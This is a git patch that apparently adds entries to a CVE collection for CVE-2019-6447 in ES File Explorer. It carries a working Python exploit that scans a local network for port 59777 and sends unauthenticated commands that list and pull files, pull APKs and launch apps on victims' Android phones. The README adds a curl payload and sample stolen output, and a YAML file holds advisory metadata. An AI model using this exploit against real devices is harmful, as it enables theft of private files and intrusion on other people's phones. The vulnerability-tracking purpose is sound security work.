From 80ec3db4c4a28d49baa9e402dfe9a35801ab6fff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=B9=94=E4=BD=B3=E6=96=87?= Date: Mon, 20 Mar 2023 10:39:10 +0800 Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2019-6447?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2019/CVE-2019-6447/CVE-2019-6447.py | 170 ++++++++++++++++++ .../2019/CVE-2019-6447/README.md | 108 +++++++++++ .../2019/yaml/CVE-2019-6447.yaml | 19 ++ openkylin_list.yaml | 2 + 4 files changed, 299 insertions(+) create mode 100644 cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py create mode 100644 cve/EsFileExplorer/2019/CVE-2019-6447/README.md create mode 100644 cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml diff --git a/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py b/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py new file mode 100644 index 00000000..69a55a1b --- /dev/null +++ b/cve/EsFileExplorer/2019/CVE-2019-6447/CVE-2019-6447.py @@ -0,0 +1,170 @@ +import json +import optparse +import requests +import sys + +from socket import * + +verbose = True + + +def sanitize_json(json): + json = json.replace("\'", "\"") + json = json.split('[')[1].split(']')[0] + json = json[0:len(json)-6] + "}" + return json + + +def get_file(addr, filepath): + if verbose: + print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr) + session = requests.Session() + + headers = {"Content-Type": "application/json"} + address = 'http://' + addr + ':59777' + filepath + filename = filepath.rsplit('/', 1)[1] + + resp = session.get(address, headers=headers, verify=False) + if verbose: + print('[*] Server responded with: ' + str(resp.status_code)) + if resp and resp.status_code == 200: + if verbose: + print('[*] Writing to file: ' + filename) + with open(filename, 'wb') as f: + f.write(resp.content) + + +def execute_cmd(addr, cmd, package): + if verbose: + print('[*] Executing command: ' + cmd + ' on ' + addr) + + session = requests.Session() + headers = {"Content-Type": "application/json"} + address = 'http://' + addr + ':59777' + + if package != '': + data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }' + else: + data = '{ "command":' + cmd + ' }' + + resp = session.post(address, headers=headers, data=data, verify=False) + if verbose: + print('[*] Server responded with: ' + str(resp.status_code)) + if "NameNotFoundException" in resp.text: + print('[!] Package \'' + package + '\' not found!') + return + if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'): + text = sanitize_json(resp.text) + else: + text = resp.text + + if resp and resp.status_code == 200: + if cmd == 'getAppThumbnail': + if verbose: + print('[*] Getting app thumbnail: ' + package) + with open(package + ".jpg", 'wb') as f: + f.write(resp.content) + elif cmd == 'appPull': + if verbose: + print('[*] Pulling app: ' + package) + with open(package + ".apk", 'wb') as f: + f.write(resp.content) + else: + print(text) + + +def is_up(addr): + s = socket(AF_INET, SOCK_STREAM) + s.settimeout(1) + if not s.connect_ex((addr, 59777)): + s.close() + return 1 + else: + s.close() + + +def show_available_cmds(): + print('') + print('######################') + print('# Available Commands #') + print('######################') + print('') + print('listFiles: List all the files') + print('listPics: List all the pictures') + print('listVideos: List all the videos') + print('listAudios: List all the audio files') + print('listApps: List all the apps installed') + print('listAppsSystem: List all the system apps') + print('listAppsPhone: List all the phone apps') + print('listAppsSdcard: List all the apk files in the sdcard') + print('listAppsAll: List all the apps installed (system apps included)') + print('getDeviceInfo: Get device info. Package name parameter is needed') + print('appPull: Pull an app from the device') + print('appLaunch: Launch an app. Package name parameter is needed') + print('getAppThumbnail: Get the icon of an app. Package name parameter is needed') + print('') + + +def set_up_menu(): + parser = optparse.OptionParser() + + parser.add_option('-g', '--get-file', + action="store", dest="filepath", + help="Get file path", default="") + parser.add_option('-c', '--cmd', + action="store", dest="cmd", + help="Command to execute", default="") + parser.add_option('-p', '--pkg', + action="store", dest="package", + help="Package name", default="") + parser.add_option('--ip', '--host', + action="store", dest="host", + help="Target host IP", default="") + parser.add_option('-n', '--network', + action="store", dest="network", + help="Network to scan", default="192.168.0.") + parser.add_option('-v', '--verbose', + action="store_true", dest="verb", + help="Loud stdout") + + return parser.parse_args() + + +def main(): + options, _ = set_up_menu() + verbose = options.verb + + if len(sys.argv) > 1 and sys.argv[1] == 'list': + show_available_cmds() + elif options.filepath != '' or options.cmd != '': + def scan_host(addr): + if verbose: + print('[*] Checking address: ' + addr) + + if is_up(addr): + if verbose: + print('[+] Address is up: ' + addr) + + if options.filepath != '': + get_file(addr, options.filepath) + elif options.cmd != '': + execute_cmd(addr, options.cmd, options.package) + + if options.host != '': + scan_host(options.host) + else: + for ip in range(0, 255): + scan_host(options.network + str(ip)) + else: + print('Usage:') + print('- python3 poc.py list') + print('- python3 poc.py --get-file [filepath]') + print('- python3 poc.py --cmd [cmd]') + print('- python3 poc.py --cmd [cmd] --host [target_host]') + print('- python3 poc.py --cmd [cmd] --network [network]') + print('- python3 poc.py --cmd [cmd] --pkg [package_name]') + print('- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]') + + +if __name__ == '__main__': + main() diff --git a/cve/EsFileExplorer/2019/CVE-2019-6447/README.md b/cve/EsFileExplorer/2019/CVE-2019-6447/README.md new file mode 100644 index 00000000..cd5b30c3 --- /dev/null +++ b/cve/EsFileExplorer/2019/CVE-2019-6447/README.md @@ -0,0 +1,108 @@ +# ES File Explorer Open Port Vulnerability - CVE-2019-6447 +As per their Google Play description: +> ES File Explorer (File Manager) is a full-featured file (Images, Music, Movies, Documents, app) manager for both local and networked use! With over 500 million users worldwide, ES File Explorer (File Manager) helps manage your android phone and files efficiently and effectively and share files without data cost. + +Everytime a user is launching the app, a HTTP server is started. This server is opening locally the port 59777: +```console +angler:/ # netstat -ap | grep com.estrongs +tcp6 0 0 :::59777 :::* LISTEN 5696/com.estrongs.android.pop +``` + +On this port, an attacker can send a JSON payload to the target +```console +curl --header "Content-Type: application/json" --request POST --data '{"command":"[my_awesome_cmd]"}' http://192.168.0.8:59777 +``` + +These commands allow an attacker **connected on the same local network to the victim**, to obtain a lot of juicy information (device info, app installed, ...) about the victim's phone, **remotely get a file** from the victim's phone and **remotely launch an app** on the victim's phone. + +## Affected Versions +4.1.9.7.4 and below + +## POC Features +With the following Proof Of Concept (POC), you can: +- List all the files in the sdcard in the victim device +- List all the pictures in the victim device +- List all the videos in the victim device +- List all the audio files in the victim device +- List all the apps installed in the victim device +- List all the system apps installed in the victim device +- List all the phone apps installed in the victim device +- List all the apk files stored in the sdcard of the victim device +- List all the apps installed in the victim device +- Get device info of the victim device +- Pull a file from the victim device +- Launch an app of your choice +- Get the icon of an app of your choice + +## Demo +[![Demo](http://img.youtube.com/vi/z6hfgnPNBRE/0.jpg)](http://www.youtube.com/watch?v=z6hfgnPNBRE) + +## How To +```console +$ python poc.py -g /sdcard/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg + +$ python poc.py --cmd appPull --pkg com.tencent.mm + +$ python poc.py --cmd getAppThumbnail --pkg com.tencent.mm + +$ python poc.py --cmd appLaunch --pkg com.tencent.mm +{"result":"0"} + +$ python poc.py --cmd getDeviceInfo +{"name":"Nexus 6P", "ftpRoot":"/sdcard", "ftpPort":"3721"} + +$ python poc.py --cmd listAppsAll +{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"}, +{"packageName":"com.android.cts.priv.ctsshim", "label":"com.android.cts.priv.ctsshim", "version":"8.1.0-4396705", "versionCode":"27", "location":"/system/priv-app/CtsShimPrivPrebuilt/CtsShimPrivPrebuilt.apk", "size":"22744", "status":"null", "mTime":"1230796800000"} + +$ python poc.py --cmd listAppsPhone +{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"} + +$ python poc.py --cmd listAppsSystem +{"packageName":"com.google.android.carriersetup", "label":"Carrier Setup", "version":"8.1.0", "versionCode":"27", "location":"/system/priv-app/CarrierSetup/CarrierSetup.apk", "size":"2462870", "status":"null", "mTime":"1230796800000"} + +$ python poc.py --cmd listApps +{"packageName":"com.google.android.youtube", "label":"YouTube", "version":"13.50.52", "versionCode":"1350523400", "location":"/data/app/com.google.android.youtube-hg9X1FaylPbUXO1SaiFtkg==/base.apk", "size":"36860368", "status":"com.google.android.apps.youtube.app.application.backup.YouTubeBackupAgent", "mTime":"1545337705957"} + +$ python poc.py --cmd listAppsSdcard + +$ python poc.py --cmd listAudios +{"name":"hangouts_incoming_call.ogg", "time":"10/17/18 11:33:16 PM", "location":"/storage/emulated/0/Android/media/com.google.android.talk/Ringtones/hangouts_incoming_call.ogg", "duration":5000, "size":"74.63 KB (76,425 Bytes)", } + +$ python poc.py --cmd listPics +{"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", } + +$ python poc.py --cmd listVideos + +$ python poc.py --cmd listFiles + +$ python poc.py --cmd listFiles --network 192.168.1. + +$ python poc.py --cmd listFiles --ip 192.168.4.17 + +$ python poc.py list + +###################### +# Available Commands # +###################### + +listFiles: List all the files +listPics: List all the pictures +listVideos: List all the videos +listAudios: List all the audio files +listApps: List all the apps installed +listAppsSystem: List all the system apps +listAppsPhone: List all the phone apps +listAppsSdcard: List all the apk files in the sdcard +listAppsAll: List all the apps installed (system apps included) +getDeviceInfo: Get device info +appPull: Pull an app from the device. Package name parameter is needed +appLaunch: Launch an app. Package name parameter is needed +getAppThumbnail: Get the icon of an app. Package name parameter is needed +``` + +## Contact +Follow me on [Twitter](https://twitter.com/fs0c131y)! You can also find a small part of my work at [https://fs0c131y.com](https://fs0c131y.com) + +## Credits +Following a tip from [@moonbocal](https://twitter.com/moonbocal), the investigation and the POC has been made with ❤️ by @fs0c131y diff --git a/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml b/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml new file mode 100644 index 00000000..b792cc07 --- /dev/null +++ b/cve/EsFileExplorer/2019/yaml/CVE-2019-6447.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-6447 +source: https://github.com/fs0c131y/ESFileExplorerOpenPortVuln +info: + name: ES 文件资源管理器(文件管理器)是一个功能齐全的文件(图像、音乐、电影、文档、应用程序)管理器,适用于本地和网络使用!ES File Explorer(文件管理器)在全球拥有超过 5 亿用户,可帮助您高效、有效地管理您的 Android 手机和文件,并在没有数据成本的情况下共享文件。 + severity: high + description: | + 通过4.1.9.7.4的ES文件资源管理器文件管理器应用程序允许远程攻击者在本地Wi-Fi网络上通过TCP端口59777请求读取任意文件或执行应用程序。这个TCP端口在ES应用程序启动一次后仍然打开,并通过HTTP响应未经身份验证的应用程序/json数据。 + scope-of-influence: + ES File Explorer 4.1.9.7.4 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2019-6447 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 8.1 + cve-id: CVE-2019-6447 + cwe-id: CWE-306 + cnvd-id:None + kve-id:None + tags: ES File Explorer,TCP,HTTP \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index cae1e168..b019aff4 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -117,6 +117,8 @@ cve: - CVE-2021-3537 fortinac: - CVE-2022-39952 + EsFileExplorer: + - CVE-2019-6447 redis: - CVE-2022-31144 java-spring: -- Gitee